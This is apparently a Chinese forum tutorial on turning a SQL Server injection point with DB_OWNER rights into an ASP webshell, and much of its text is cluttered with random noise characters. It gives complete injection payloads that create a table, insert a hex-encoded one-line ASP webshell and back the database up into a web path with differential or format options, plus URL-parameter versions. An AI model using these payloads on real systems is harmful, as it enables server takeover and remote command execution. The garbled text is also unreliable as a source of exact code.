DB_OWNER权限得到webshell的两点改进:; f- [: M& v. l
1 G! ^4 N2 t' ~# U( F/ ~- Q减少备份文件大小,得到可执行的webshell成功率提高不少
' Q$ l. L. G9 T# L5 u/ ]( h一利用差异备份
3 j2 }6 `4 }9 S- B3 [3 O加一个参数WITH DIFFERENTIAL% s4 k1 a$ Z1 ?: B( M2 Z6 m
0 m' g s4 k( u( O$ E: ?$ s1
% P- {" z: D' a7 w1 ]7 I, n3 L3 C8 q* |2
1 z4 i& T. U9 r37 a: K+ z0 g5 U" u d
48 A. S+ ]* K: l5 {/ j+ | R6 l
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
0 b' J1 E$ Q/ Ocreate table [dbo].[xiaolu] ([cmd] [image]);
% Z0 I N+ n7 _% Kinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)5 F$ M9 P% O6 W2 r- g) s$ J
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL & F- ]; k8 P8 A k6 q
4 C# f, ?' ]5 h8 D. ?1 l0 Y
二利用完全FORMAT
* o S6 e! q; G" U8 x, c* \加一个参数WITH FROMAT
. j6 a$ ^+ [, G1 o; n5 ~有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
( X1 K2 |9 b4 I4 E" j! H, G. d1 {6 O% j( I0 l
18 F5 Y6 F# b7 ]' L. h A
25 r" U, u' F# H7 E
3
, Q2 Z& N; J* P* }/ e6 O4
( \2 v% A5 }7 E/ d; ^- }. N( k/ _ declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s+ I0 _ G5 v9 n; Z% k Q
create table [dbo].[xiaolu] ([cmd] [image]);$ ^2 V8 d) [1 v X
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
/ K' Y# d# P( h+ p& w8 D1 |declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT * Q7 ` C2 ?. ]" X+ N& C
7 z; m0 g- F5 F# [总的来说就是那么简单几句,下面以备份数据库model为例子# T' K7 b% V% G- g
1
9 E% y8 S; t0 `- b7 w! P$ T. c; D, W \3 f. K; i! l
18 ^# S3 n0 C/ M
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
4 e& b( M6 R0 t$ x' w
7 k+ `( w8 D2 U8 ^1 {$ j+ ~; ~# v& o2% j. |6 Q1 G R! k8 n1 B/ l
; L, [* s3 [4 P- U, }2 ~
1
7 f+ V; c- i j3 l id=1;backup database model to disk='你的路径‘ with differential,format;--
8 t5 C" [, k" @! @ |